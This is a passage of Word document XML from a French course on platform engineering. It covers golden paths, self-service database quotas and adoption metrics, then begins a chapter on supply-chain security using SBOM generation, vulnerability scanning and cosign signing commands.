        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les équipes demandent des bases par ticket.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Définissez une ressource.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Précisez les tailles.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Ajoutez des quotas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 89.3 — Mesurer l'adoption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   PRODUIT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La direction veut savoir si la plateforme est utilisée.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Choisissez un indicateur.</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Mesurez-le.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Interprétez.</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89.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## Chemin d'or — service HTTP</w:t>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>platform new service &lt;nom&gt; --owner &lt;equipe&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Dépôt créé avec pipeline, manifestes et runbook</w:t>
        <w:br/>
        <w:t>3. Environnements recette et production provisionnés automatiquement</w:t>
        <w:br/>
        <w:t>4. Premier déploiement via une demande de fusion</w:t>
        <w:br/>
        <w:br/>
        <w:t>Fourni : pipeline, TLS, journaux, métriques, traces, sauvegarde</w:t>
        <w:br/>
        <w:t>Attendu : tests, propriétaire, runbook, budget de performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le chemin d'or doit couvrir le cas majoritaire de bout en bout, sinon les équipes complètent à la main.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce qui est attendu de l'équipe doit être vérifié automatiquement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 89.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: platform.exemple.fr/v1</w:t>
        <w:br/>
        <w:t>kind: BaseDeDonnees</w:t>
        <w:br/>
        <w:t>metadata: { name: catalogue, namespace: boutique }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  moteur: postgresql</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version: "16"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  taille: petite</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sauvegarde: quotidienne</w:t>
        <w:br/>
        <w:t xml:space="preserve">  retentionJours: 14</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t># Quota par espace de noms</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: ResourceQuota</w:t>
        <w:br/>
        <w:t>metadata: { name: bases, namespace: boutique }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hard:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    count/basededonnees.platform.exemple.fr: "2"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les tailles prédéfinies évitent les demandes sur mesure ingérables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le quota empêche un espace de noms de consommer tout le cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 89.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indicateur : part des services déployés avec le pipeline fourni</w:t>
        <w:br/>
        <w:t xml:space="preserve">Mesure : 34 dépôts sur 41 utilisent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.github/workflows/ci.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fourni → 83 %</w:t>
        <w:br/>
        <w:br/>
        <w:t>Interprétation : adoption correcte, mais 7 dépôts hors chemin.</w:t>
        <w:br/>
        <w:t>Action : contacter les 7 équipes, comprendre le motif avant d'imposer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un taux d'adoption sans explication des écarts ne permet pas d'agir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les services hors chemin révèlent souvent un manque de la plateforme.</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Qu'est-ce qu'un chemin d'or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Une obligation</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Un parcours outillé pour le cas majoritaire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Un outil propriétaire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Un audit</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 doit contenir un contrat de plateforme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Uniquement les outils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Garanties, responsabilités, échappatoire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 code source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Les coûts</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Pourquoi des quotas en libre-service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Pour facturer</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Pour éviter l'épuisement du socle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Pour ralentir</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Pour la conformité</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Quel indicateur mesure l'utilité de la plateforme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Nombre d'outils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Délai de mise en production</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Taille de l'équipe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Nombre de clusters</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Quel est le piège d'une plateforme trop fermée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Trop de liberté</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Les contournements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Trop de support</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Trop de coûts</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Il doit rester plus rapide que le contournement.</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Sans échappatoire, la plateforme devient un blocage.</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Une capacité sans limite finit par saturer le cluster.</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C'est le temps gagné par les équipes qui compte.</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Les équipes recréent leur propre tuyauterie en parallèle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>90. Sécurité de la chaîne logicielle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Garantir que ce qui est déployé provient bien du code relu, avec des dépendances connues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 89</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Cartographier les maillons de la chaîne.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Inventorier les dépendances avec un SBOM.</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Vérifier l'origine et l'intégrité d'un artefact.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Appliquer des politiques d'admission.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Réagir à une vulnérabilité publiée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>90.1 La chaîne et ses maillons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Entre la ligne de code et le conteneur en production, un artefact traverse le dépôt, l'intégration continue, un registre et un cluster. Chaque maillon peut être compromis ou mal configuré.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="107" name="Picture 107"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f105.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.105 — Les maillons d'une chaîne logicielle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.354 — Cinq maillons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0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Maillon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Contrôle</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code</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Contribution malveillante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Revue obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Dépendances</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Paquet compromis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Verrou, provenance</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Construction</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Environnement altéré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Runner isolé, reproductibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Registre</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Étiquette modifiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Immuabilité, signature</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cluster</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Image inconnue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Politique d'admission</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SBOM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Inventaire logiciel des composants d'un artefact : bibliothèques, versions, licences et dépendances transitives. Il permet de savoir en quelques minutes si une faille publiée vous concerne.</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UNE DÉPENDANCE EST DU CODE EXÉCUTÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ajouter une bibliothèque revient à exécuter le code d'un inconnu avec vos droits. Le verrouillage des versions et la vérification de la provenance ne sont pas des formalités.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>90.2 Inventorier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le SBOM se génère à la construction, se signe et s'archive avec l'artefact. Sans archivage, il ne sert qu'au moment où l'on y pense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes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SBOM au format CycloneDX, généré à la construction</w:t>
        <w:br/>
        <w:t>syft registry.exemple.fr/app:1.4.2 -o cyclonedx-json &gt; app-1.4.2.sbom.json</w:t>
        <w:br/>
        <w:br/>
        <w:t># Analyse des vulnérabilités à partir du SBOM</w:t>
        <w:br/>
        <w:t>grype sbom:app-1.4.2.sbom.json --fail-on high</w:t>
        <w:br/>
        <w:br/>
        <w:t># Archivage avec l'artefact</w:t>
        <w:br/>
        <w:t>cosign attach sbom --sbom app-1.4.2.sbom.json \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification ultérieure</w:t>
        <w:br/>
        <w:t>cosign download sbom registry.exemple.fr/app:1.4.2 | jq '.components | length'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.355 — Quatre formats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83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Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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Écosystème</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CycloneDX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sécurité et conformité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Large</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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SPDX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Licences et conformité</w:t>
            </w:r>
          </w:p>
        </w:tc>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Industrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>package-lock.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendances d'un projet Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2704"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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go.sum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Empreintes des modules</w:t>
            </w:r>
          </w:p>
        </w:tc>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Go</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une recherche ciblée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Vérifier un composant précis dans tous les artefacts</w:t>
        <w:br/>
        <w:t>for img in $(crane ls registry.exemple.fr/app); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cosign download sbom "registry.exemple.fr/app:$img" 2&gt;/dev/null \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    | jq -r --arg p "log4j-core" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">      '.components[] | select(.name==$p) | "\($img) \(.version)"'</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>90.3 Vérifier l'origine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La signature répond à « qui a produit cet artefact ». L'attestation de provenance répond à « comment il a été produit ». Les deux ensemble permettent une politique d'admission sérieuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
